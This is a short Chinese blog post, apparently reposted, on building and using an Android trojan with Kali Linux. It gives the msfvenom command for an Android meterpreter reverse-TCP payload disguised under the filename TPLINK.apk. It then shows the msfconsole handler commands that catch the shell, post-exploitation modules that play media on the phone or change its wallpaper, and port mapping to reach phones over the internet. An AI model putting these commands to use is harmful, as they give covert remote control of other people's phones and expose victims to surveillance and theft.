kali下androidshell那些事

普通版

kali中我们可以利用msfvenom来生成一个Android木马。命令如下:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.232.195 LPORT=5555 R > TPLINK.apk
 

这样便生成了一个名为TPLINK.apk的Android木马。
1.png


然后我们配合msfcosole进行攻击即可。

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LPORT 5555
exploit
 

手机端安装并执行,成功获得shell。

一些另外的玩法

给手机播放视频和音频文件(需更新到最新版的msf)

命令格式: paly /root/xxx.mp3 mp4
2.png

 

修改手机壁纸

background
use post/multi/manage/set_wallpaper
sessions
set sessions id
set WALLPAPER_FILE JPG
exploit
 

晋级玩法

利用armitage图形化管理工具
3.png

 

可视化的文件管理

4.png


骨灰级

 

外网木马

我们可以利用花生壳进行端口映射完成外网木马的渗透测试,添加端口如下!
5.png

然后在kali中设置花生壳的端口和ip地址即可。

转载:https://blog.bbskali.cn/index.php/archives/524/

 

posted @ 2020-03-13 16:09  the苍穹  阅读(...)  评论(...编辑  收藏